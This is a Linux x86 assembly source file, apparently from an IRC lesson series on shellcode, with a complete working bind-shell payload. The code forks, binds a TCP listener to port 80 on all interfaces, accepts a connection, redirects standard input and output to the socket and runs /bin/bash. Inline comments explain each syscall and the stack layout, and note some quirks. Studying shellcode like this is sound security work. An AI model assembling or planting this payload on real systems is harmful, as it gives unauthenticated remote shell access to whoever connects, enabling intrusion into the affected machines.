  1. ;
  2. ; part of my shellcode for noobs lesson series hosted in #goatzzz on irc.enigmagroup.org
  3. ; SAFETY:
  4. ;   /!\ DO NOT FORGET TO KILL THIS AFTER RUNNING IT, IT WILL LEAVE YOU WITH AN OPEN SHELL FACING THE INTERNET /!\
  5. ; ----------------------------------------------------------------------------
  6. ; "THE BEER-WARE LICENSE" (Revision 43):
  7. ; <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
  8. ; can do whatever you want with this stuff. If we meet some day, and you think
  9. ; this stuff is worth it, you can buy me a beer in return Aaron R. Yool
  10. ; ----------------------------------------------------------------------------
; 32-bit syscall convention: syscall number in eax; args in ebx, ecx, edx, esi, edi, and ebp
  12.  
[bits 32]
section .text
global _start

;-----------------------------------------------------------------------
; Bind-shell payload, Linux x86 (32-bit int 0x80 interface).
; Flow: fork -> child: socket / bind(INADDR_ANY:80) / listen / accept
;       -> dup2 the accepted socket onto fds 0..3 -> execve("/bin/bash")
;       parent: exit(0).
; Syscall ABI: eax = syscall number; args in ebx, ecx, edx, esi, edi, ebp.
; Every socket operation goes through sys_socketcall (0x66): ebx = sub-call
; id, ecx = pointer to an argument array built on the stack.
; Register roles: esi = listening socket fd, later the accepted client fd;
;                 ecx = argument-array pointer, then the dup2 target fd.
; Analyst notes: observable behaviour is a fork, a TCP listener on port 80
; bound to all interfaces, and a /bin/bash whose fds 0-3 are a socket.
;-----------------------------------------------------------------------
_start:
; fork(void);
    xor eax,eax
    mov al,0x02     ; sys_fork
    int 0x80
    cmp eax,1   ; if this is a child, or we have failed to clone
    jl fork     ; jump to the main code (eax <= 0: child, or fork returned -1)
    jmp exit    ; parent (eax = child pid) exits
; NOTE: the label `fork` marks the child/failure path; it does not fork again.
fork:
; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
; Argument array is built on the stack, last push = args[0].
    xor eax,eax
    xor ebx,ebx
    push eax        ; unused 4th slot (socket() reads only 3 args)
    mov al,0x6  ; IPPROTO_TCP
    push eax        ; args[2] = 6
    mov al,0x1  ; SOCK_STREAM
    push eax        ; args[1] = 1
    mov al,0x2  ; AF_INET
    push eax        ; args[0] = 2
    xor eax,eax
    mov al, 0x66 ; sys_socketcall
    mov bl,0x1  ; sys_socket
    mov ecx,esp     ; ecx -> {AF_INET, SOCK_STREAM, IPPROTO_TCP}
    int 0x80
; bind(s, (struct sockaddr *) &name, sizeof (name));
; struct sockaddr_in is assembled on the stack from the pushes below.
; Because the final push is a 16-bit `push bx`, the dword pushed as
; "0x5000" straddles fields: its low two bytes (00 50) are sin_port
; = htons(80) and its high two bytes are the start of sin_addr (0);
; everything else pushed here is zero, so sin_addr = INADDR_ANY and
; sin_zero is zero.
    mov esi,eax     ; esi = listening socket fd
    xor eax,eax
    xor ebx,ebx
    push eax    ; zero padding (tail of sin_zero)
    push eax    ; zero padding (sin_zero)
    push eax    ; zero: second half of sin_addr + start of sin_zero
    mov ah,0x50     ; eax = 0x00005000
    push eax    ; bytes 00 50 00 00 -> sin_port = htons(80), then sin_addr high half = 0
    xor eax,eax
    mov bl,0x02 ; sin_family: AF_INET
    push bx         ; 16-bit push: sin_family at the lowest address
    mov edx,esp     ; edx -> struct sockaddr_in
    mov bl,0x10     ; ebx = 16 = sizeof(struct sockaddr_in)
    push ebx        ; args[2] = addrlen
    mov bl,0x2 ; sys_bind
    push edx        ; args[1] = &name
    push esi ;s     ; args[0] = socket fd
    mov edx,esi     ; edx is not read by socketcall; appears to be a leftover
    mov ecx,esp     ; ecx -> {s, &name, 16}
    mov al,0x66 ; sys_socketcall
    int 0x80

; listen(s, backlog);
; ecx still points at the bind() argument array, so the kernel reads
; args[1] (the sockaddr pointer value) as the backlog. The original
; comment said listen(s, 0); the oversized value presumably gets clamped
; by the kernel -- confirm if exact backlog matters.
    xor eax,eax
    mov bl,0x4  ; sys_listen
    mov al,0x66 ; sys_socketcall
    int 0x80

; accept(s, NULL, NULL);
    xor eax,eax
    xor ebx,ebx
    push eax        ; args[2] = addrlen ptr = NULL
    push eax        ; args[1] = addr = NULL
    push esi    ; args[0] = listening socket fd
    mov ecx,esp
    mov bl,0x5  ; sys_accept
    mov al,0x66 ; sys_socketcall
    int 0x80

; dup2(client, i) for i = 0..3 -- stdin/stdout/stderr (and fd 3) become the socket.
    mov esi,eax     ; esi = accepted client fd
    xor ebx,ebx
    xor ecx,ecx     ; ecx = target fd counter
; NOTE(review): `loop` is also an x86 mnemonic; confirm the assembler
; accepts it as a label.
loop:
    xor eax,eax
    mov ebx,esi ; client fd (ebx/ecx survive int 0x80, ebx is re-set anyway)
    mov al,0x3f ; sys_dup2
    int 0x80
    inc ecx
    cmp ecx,4
    jne loop        ; repeat until fds 0,1,2,3 are covered

; execve(SHELLPATH,{SHELLPATH,0},0);
; jmp/call/pop pattern: `call load_sh` pushes the address of the bytes
; that follow it (the path string), which `pop esi` then recovers.
    xor eax,eax
    mov al,0x0b     ; sys_execve
    jmp short sh
load_sh:
    pop esi         ; esi = address of the path string at `sh`
    xor edx,edx     ; envp = NULL
    push edx        ; argv[1] = NULL
    push esi        ; argv[0] = path
    mov ecx,esp     ; ecx -> argv
    mov ebx,esi     ; ebx = path
    int 0x80        ; only returns on failure; falls through to exit
exit:
; exit(0);
    xor eax,eax
    mov al,0x1      ; sys_exit
    xor ebx,ebx     ; status 0
    int 0x80

sh:
    call load_sh    ; pushes the address of the string below, jumps back
    db "/bin/bash"